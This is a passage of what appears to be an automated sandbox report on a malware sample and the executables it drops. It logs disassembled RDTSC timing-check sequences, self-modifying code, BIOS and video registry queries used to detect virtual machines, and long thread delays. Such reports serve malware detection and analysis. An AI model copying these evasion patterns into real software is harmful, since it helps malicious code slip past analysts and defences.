                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670ABC second address: 5670B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushfd 0x00000006 jmp 00007F08ED2385F2h 0x0000000b adc esi, 65048458h 0x00000011 jmp 00007F08ED2385EBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F08ED2385F6h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F08ED2385F8h 0x0000002a xor si, 4918h 0x0000002f jmp 00007F08ED2385EBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670B2F second address: 5670B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670B35 second address: 5670B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670B39 second address: 5670B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 6E06F442h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670B54 second address: 5670B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680C9C second address: 5680CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680CB9 second address: 5680CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov eax, 4C205759h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57006B9 second address: 57006BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57006BD second address: 57006CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57006CC second address: 57006F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57006F0 second address: 57006F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57006F4 second address: 5700707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5700707 second address: 5700789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385EFh 0x00000009 or ecx, 7D3FBC6Eh 0x0000000f jmp 00007F08ED2385F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F08ED2385F0h 0x0000001b add cx, A7E8h 0x00000020 jmp 00007F08ED2385EBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a jmp 00007F08ED2385F9h 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F08ED2385EDh 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A37 second address: 56F0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A3D second address: 56F0A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A41 second address: 56F0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A45 second address: 56F0A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F08ED2385F9h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A69 second address: 56F0A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A6F second address: 56F0A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0A7F second address: 56F0A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690008 second address: 569000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569000C second address: 569001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569001E second address: 5690096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d pushfd 0x0000000e jmp 00007F08ED2385F0h 0x00000013 xor cl, FFFFFFC8h 0x00000016 jmp 00007F08ED2385EBh 0x0000001b popfd 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F08ED2385F9h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F08ED2385EEh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F08ED2385F7h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690096 second address: 56900C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b jmp 00007F08ED2F2E8Ch 0x00000010 pushad 0x00000011 mov ecx, 686C76D7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0C7B second address: 56F0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2385EDh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0CA5 second address: 56F0D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F08ED2F2E93h 0x00000015 add ah, 0000005Eh 0x00000018 jmp 00007F08ED2F2E99h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F08ED2F2E90h 0x00000024 and si, 1158h 0x00000029 jmp 00007F08ED2F2E8Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0D14 second address: 56F0D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, B47Ah 0x00000007 pushfd 0x00000008 jmp 00007F08ED2385EBh 0x0000000d xor ecx, 5E47301Eh 0x00000013 jmp 00007F08ED2385F9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push dword ptr [ebp+08h] 0x0000001f jmp 00007F08ED2385EEh 0x00000024 call 00007F08ED2385E9h 0x00000029 jmp 00007F08ED2385F0h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007F08ED2385ECh 0x00000037 pop eax 0x00000038 mov ebx, 6279B7B6h 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0D8B second address: 56F0DB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov ecx, 6C6FC745h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F08ED2F2E8Bh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, al 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0DB0 second address: 56F0DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0DFF second address: 56F0E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F0E03 second address: 56F0E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0514 second address: 56A0535 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 1EB4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 015F7220h 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F08ED2F2E8Eh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0535 second address: 56A0539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0539 second address: 56A053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A053F second address: 56A0545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0545 second address: 56A0549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0549 second address: 56A05C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov esi, 20FEB3F1h 0x00000011 mov al, 9Eh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F08ED2385F9h 0x0000001b push FFFFFFFEh 0x0000001d pushad 0x0000001e mov cl, FCh 0x00000020 pushfd 0x00000021 jmp 00007F08ED2385F9h 0x00000026 adc ah, FFFFFF96h 0x00000029 jmp 00007F08ED2385F1h 0x0000002e popfd 0x0000002f popad 0x00000030 call 00007F08ED2385E9h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F08ED2385EDh 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A05C5 second address: 56A05E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2F2E8Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A05E9 second address: 56A05EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A05EF second address: 56A068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F08ED2F2E98h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F08ED2F2E8Bh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d mov esi, ebx 0x0000001f push edi 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 popad 0x00000024 pop eax 0x00000025 pushad 0x00000026 jmp 00007F08ED2F2E99h 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f push 2670FCAEh 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F08ED2F2E96h 0x0000003b sbb ch, 00000068h 0x0000003e jmp 00007F08ED2F2E8Bh 0x00000043 popfd 0x00000044 mov bx, cx 0x00000047 popad 0x00000048 add dword ptr [esp], 50C7B152h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov ecx, edi 0x00000054 mov ebx, 64B39AAEh 0x00000059 popad 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A068D second address: 56A06C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385F1h 0x00000009 sbb cl, 00000036h 0x0000000c jmp 00007F08ED2385F1h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A06C6 second address: 56A06CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A06CA second address: 56A06D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A06D0 second address: 56A0712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov ecx, ebx 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F08ED2F2E94h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F08ED2F2E8Ah 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0712 second address: 56A0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0716 second address: 56A071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A071C second address: 56A0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0722 second address: 56A0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0726 second address: 56A073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2385EBh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A073E second address: 56A07B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2F2E8Fh 0x00000009 sbb si, 9D8Eh 0x0000000e jmp 00007F08ED2F2E99h 0x00000013 popfd 0x00000014 mov ecx, 666D2097h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov ah, 8Bh 0x00000020 jmp 00007F08ED2F2E95h 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F08ED2F2E91h 0x0000002c xchg eax, ebx 0x0000002d jmp 00007F08ED2F2E8Eh 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A07B9 second address: 56A07D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385F3h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A07D1 second address: 56A082C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F08ED2F2E8Ah 0x00000011 xor al, 00000058h 0x00000014 jmp 00007F08ED2F2E8Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d jmp 00007F08ED2F2E94h 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EDEFA6 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EDEEA9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EDC45A instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 109AA01 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1116F09 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4DEFA6 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4DEEA9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4DC45A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 69AA01 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 716F09 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSpecial instruction interceptor: First address: 15DBACF instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSpecial instruction interceptor: First address: 1784373 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSpecial instruction interceptor: First address: 1782B1F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeSpecial instruction interceptor: First address: 180CCE7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSpecial instruction interceptor: First address: 7FF60AA36954 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeSpecial instruction interceptor: First address: 7FF60AA36964 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSpecial instruction interceptor: First address: B27A18 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSpecial instruction interceptor: First address: B2799B instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSpecial instruction interceptor: First address: CC55D5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSpecial instruction interceptor: First address: CED5DB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSpecial instruction interceptor: First address: CD44BF instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSpecial instruction interceptor: First address: D52969 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeMemory allocated: 1AC38E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeMemory allocated: 1AC51140000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeMemory allocated: 13F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeMemory allocated: 1AFB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_056F0D84 rdtsc 1_2_056F0D84
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599873
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599764
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599641
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599519
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599391
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599266
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599141
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598889
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598780
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598422
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598230
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597969
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597391
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597108
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596996
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596874
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596763
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596625
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596358
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596203
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596088
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 595984
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 595872
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 876Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 863Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 864Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2736Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 886Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 876Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 901Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeWindow / User API: threadDelayed 5845Jump to behavior
